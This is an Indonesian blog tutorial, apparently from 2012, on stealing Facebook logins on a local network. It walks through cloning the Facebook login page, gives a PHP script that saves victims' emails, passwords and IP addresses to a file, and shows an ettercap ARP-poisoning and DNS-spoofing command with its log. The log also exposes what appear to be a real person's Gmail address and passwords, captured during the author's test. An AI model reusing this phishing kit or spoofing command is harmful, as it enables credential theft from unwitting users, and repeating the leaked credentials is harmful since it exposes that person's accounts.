Phissing atau dikenal di kalangan umum sebagai fakelogin sebenarnya adalah suatu tehnik dalam man on the middle attack. Dengan memanfaatkan human error atau kelalaian internet user , maka phissing merupakan salah satu metode serangan yang tidak dapat di anggap enteng.
Ok ,langsung saja kali ini saya akan membuka tabir salah satu metode klasik phissing attack yang memang masih sangat work atau bisa di katakan masih berhasil di lakukan baik lewat metode NAT maupun LAN.1. Menyiapkan fakelogin
Untuk contoh kali ini , saya akan menggunakan situs jejaring sosial paling populer saat artikel ini ditulis, saya memilih facebook.com sebagai target spoofing kali ini.Untuk membuat fakelogin facebook , maka kita hanya tinggal membuka facebook.com kemudian kita save page indexnya dengan control kanan lalu pilih save a
s Save dengan nama index.html dan save di direktori localhost atau webserver lokal anda. Karena saya menggunakan backtrack maka saya menyimpannya di direktori /var/www
Kemudian edit file index.html tadi dengan editor text anda kali ini saya gunakan gedit
Cari dengan fasilitas search ( cntrl+f ) kata action kemudian rubah isinya dengan “post.php”
action="https://www.facebook.com/login.php?login_attempt=1" Rubah jadi
action="post.php" Kemudian siapkan file post.php dengan source code di bawah ini , simpan dengan nama post.php dalam direktori yang sama dengan index.html.
<!--?php
$file = "zeeganteng.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "// ";
?>Perhatikan nilai pada variable $file. Disanalah script tersebut akan menyimpan hasil input pada form login dan form password. karena itu kita harus membuat sebuah file kosong zeeganteng.txt kemudian simpan pada direktori yang sama.
Bagi pengguna linux , jangan lupa untuk mengatur chmod 777 ke seluruh file agar dapat di esekusi oleh “other”
zee@eichel{/var}:chown 777 www -R
zee@eichel{/var}:ls -l www
total 52
drwxrwxrwx 3 777 527 4096 2012-01-06 21:23 ./
drwxr-xr-x 18 root root 4096 2011-11-03 18:50 ../
drwx------ 2 777 root 4096 2012-01-06 20:56 index_files/
-rw-r--r-- 1 777 root 34008 2012-01-06 21:16 index.html
-rw-r--r-- 1 777 root 0 2012-01-06 21:21 zeeganteng.txt
-rw-r--r-- 1 777 root 911 2012-01-06 21:21 post.phpSaya melakukan testing .. ke http://127.0.0.1/
2. Spoofing Attack
Setelah kita berhasil membuat fakelogin tadi , saatnya kita melakukan serangan spoofing agar korban tidak harus menulis ip address kita untuk mencapai fakelogin yang telah kita persiapkan pada direktori localhost kita. Dalam kasus ini saya memiliki ip address 192.168.1.6 maka saya melakukan spoof attack dari domain facebook.com dan mengarah kepada ip address saya. Untuk melakukan itu silahkan teman-teman membaca artikel saya sebelumnya mengenai ettercap dan dns spoofing pada alamat di bawah ini.http://zeestuff.wordpress.com/2012/01/06/ettercap-di-backtrack-v/
zee@eichel{/var}:ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0… (Ethernet)
wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
Privileges dropped to UID 0 GID 0…
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %
9 hosts added to the hosts list…
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…
Text only Interface activated…
Hit ‘h’ for inline help
Activating dns_spoof plugin…
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [api-read.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-ie-w.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [pixel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-244.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [id-id.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [es-la.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [pt-br.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [fr-fr.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [de-de.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [it-it.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [ar-ar.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [hi-in.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
IMAP : 74.125.157.109:993 -> USER: cassa.prodigy@gmail.com PASS: m1rw4nju4n22091985
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [m.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [m.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [graph.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [api.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-244.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
IMAP : 173.194.66.109:993 -> USER: cassa.prodigy@gmail.com PASS: m0twhnju4n22ees1985
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
DHCP: [F4:EC:38:99:60:F3] REQUEST 192.168.1.6
DHCP: [192.168.1.1] ACK : 192.168.1.6 255.255.255.0 GW 192.168.1.1 DNS 8.8.8.8 “”
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
Upz lagi spoofed om mirwan aka cassprodigy kena spoof kwwkkw.. maap2 om .. langsung ganti aja dah passwordnya
Kalau sudah pastinya jika korban membuka url facebook.com maka akan di redirect ke 192.168.1.6 dan menemukan login palsu kemudian akan memasukan user name berikut password..yang nantinya akan di rekam di file zeeganteng.txt
Ok sampai di sini dulu berhubung ane mau siap2 buat seminar besok.. nanti saya update lagi cara untuk menangkal dan menghindari serangan phissing ini..ok see u again ..
